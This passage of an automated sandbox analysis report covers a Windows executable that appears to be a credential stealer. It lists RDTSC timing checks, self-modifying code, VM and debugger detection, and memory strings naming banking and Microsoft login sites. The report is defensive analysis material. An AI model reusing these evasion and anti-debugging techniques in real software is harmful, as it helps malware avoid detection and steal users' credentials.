              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0CD5 second address: 52B0CDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0CDB second address: 52B0CE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0CE1 second address: 52B0CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0DB4 second address: 52B0DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 test al, al 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov bx, 37E4h 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0DC4 second address: 52B0DF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx ebx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FBAB9C5189Ch 0x00000011 pushad 0x00000012 mov ecx, 6A5C95B9h 0x00000017 movzx esi, dx 0x0000001a popad 0x0000001b cmp dword ptr [ebp+08h], 00002000h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FBA4947DCECh 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0A1B second address: 52C0A30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA4947B571h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0A30 second address: 52C0A5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FBA4947DCEDh 0x0000000e mov ebp, esp 0x00000010 jmp 00007FBA4947DCEEh 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0A5D second address: 52C0A61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0A61 second address: 52C0A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0A67 second address: 52C0A6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0A6D second address: 52C0A71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0A71 second address: 52C0A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBA4947B578h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0A94 second address: 52C0ACC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947DCEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b jmp 00007FBA4947DCF4h 0x00000010 popad 0x00000011 mov esi, dword ptr [ebp+0Ch] 0x00000014 pushad 0x00000015 jmp 00007FBA4947DCEAh 0x0000001a push eax 0x0000001b push edx 0x0000001c mov edx, esi 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0ACC second address: 52C0B21 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 test esi, esi 0x0000000a jmp 00007FBA4947B56Fh 0x0000000f je 00007FBAB9C48E38h 0x00000015 jmp 00007FBA4947B576h 0x0000001a cmp dword ptr [75AF459Ch], 05h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FBA4947B577h 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0B21 second address: 52C0B60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947DCF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FBAB9C6363Fh 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 xchg eax, esi 0x00000014 pushad 0x00000015 mov cx, 8E1Dh 0x00000019 movzx esi, di 0x0000001c popad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FBA4947DCEBh 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0B60 second address: 52C0B66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0B66 second address: 52C0B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0B6A second address: 52C0B6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0BDE second address: 52C0BE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0C26 second address: 52C0C41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B577h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0C41 second address: 52C0C59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA4947DCF4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0C59 second address: 52C0C85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B56Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pushad 0x0000000d jmp 00007FBA4947B574h 0x00000012 push eax 0x00000013 push edx 0x00000014 mov di, cx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0C85 second address: 52C0C97 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 7953h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov ecx, 1117DEC1h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B75DE second address: 68B75EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007FBA4947B56Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B75EC second address: 68B75F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B75F6 second address: 68B75FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B6612 second address: 68B6618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B6779 second address: 68B6799 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBA4947B57Ah 0x00000008 jmp 00007FBA4947B574h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B6799 second address: 68B679D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B6C20 second address: 68B6C26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B6C26 second address: 68B6C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B6C2C second address: 68B6C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B6EC8 second address: 68B6EFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBA4947DCF9h 0x00000008 jng 00007FBA4947DCE6h 0x0000000e jmp 00007FBA4947DCEEh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B9E20 second address: 68B9E8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B574h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FBA4947B568h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov esi, dword ptr [ebp+122D396Ah] 0x0000002c or dword ptr [ebp+122D1F7Ah], ecx 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+122D369Bh], ecx 0x0000003a or edi, dword ptr [ebp+122D2B97h] 0x00000040 call 00007FBA4947B569h 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FBA4947B56Eh 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B9E8A second address: 68B9F4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947DCEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push esi 0x0000000c jc 00007FBA4947DCE6h 0x00000012 pop esi 0x00000013 pop ebx 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jne 00007FBA4947DCF0h 0x0000001e mov eax, dword ptr [eax] 0x00000020 jmp 00007FBA4947DCEFh 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 pushad 0x0000002a je 00007FBA4947DCE8h 0x00000030 push eax 0x00000031 pop eax 0x00000032 jmp 00007FBA4947DCF1h 0x00000037 popad 0x00000038 pop eax 0x00000039 adc ecx, 7667D1DBh 0x0000003f push 00000003h 0x00000041 mov edi, 5B473BB1h 0x00000046 push 00000000h 0x00000048 push 00000000h 0x0000004a push eax 0x0000004b call 00007FBA4947DCE8h 0x00000050 pop eax 0x00000051 mov dword ptr [esp+04h], eax 0x00000055 add dword ptr [esp+04h], 00000014h 0x0000005d inc eax 0x0000005e push eax 0x0000005f ret 0x00000060 pop eax 0x00000061 ret 0x00000062 jmp 00007FBA4947DCEBh 0x00000067 mov dword ptr [ebp+122D1C86h], esi 0x0000006d push 00000003h 0x0000006f ja 00007FBA4947DCF6h 0x00000075 push 83722EFAh 0x0000007a jl 00007FBA4947DCF4h 0x00000080 push eax 0x00000081 push edx 0x00000082 pushad 0x00000083 popad 0x00000084 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B9F4B second address: 68B9F4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B9F4F second address: 68B9FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 43722EFAh 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FBA4947DCE8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 clc 0x00000028 mov dx, bx 0x0000002b lea ebx, dword ptr [ebp+1244FBE4h] 0x00000031 adc di, 3F11h 0x00000036 xchg eax, ebx 0x00000037 jnp 00007FBA4947DCEEh 0x0000003d push eax 0x0000003e push edi 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B9FA5 second address: 68B9FA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68AC82B second address: 68AC850 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBA4947DCEBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBA4947DCF2h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68AC850 second address: 68AC859 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D7618 second address: 68D7621 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D78EE second address: 68D78F7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D78F7 second address: 68D7906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FBA4947DCE6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D7906 second address: 68D7935 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 ja 00007FBA4947B566h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007FBA4947B56Eh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jp 00007FBA4947B56Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F3CA2F instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 10DFA7E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F3A552 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 10F094F instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 116C82B instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 673DBDD instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 673DAEA instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 68DEE29 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6900F67 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 68E59EC instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 673DAE4 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 697182D instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7368Thread sleep time: -34017s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7372Thread sleep time: -40020s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7440Thread sleep time: -32000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7448Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7352Thread sleep time: -50025s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7360Thread sleep time: -36018s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -44022s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7348Thread sleep time: -40020s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7356Thread sleep time: -44022s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7344Thread sleep time: -44022s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: file.exe, 00000000.00000002.2552824652.00000000068BE000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2546486624.00000000010C3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: file.exe, 00000000.00000002.2547545469.0000000001588000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
              Source: file.exe, 00000000.00000003.2147291684.0000000005D97000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: file.exe, 00000000.00000002.2547545469.00000000015B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2543212141.000000000160F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\v
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2147291684.0000000005D97000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: file.exe, 00000000.00000002.2547545469.00000000015B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWDV
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: file.exe, 00000000.00000002.2552824652.00000000068BE000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2546486624.00000000010C3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: file.exe, 00000000.00000003.2147375988.0000000005D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: file.exe, 00000000.00000002.2552824652.00000000068BE000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: file.exe, 00000000.00000002.2546486624.00000000010C3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: oProgram Manager
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
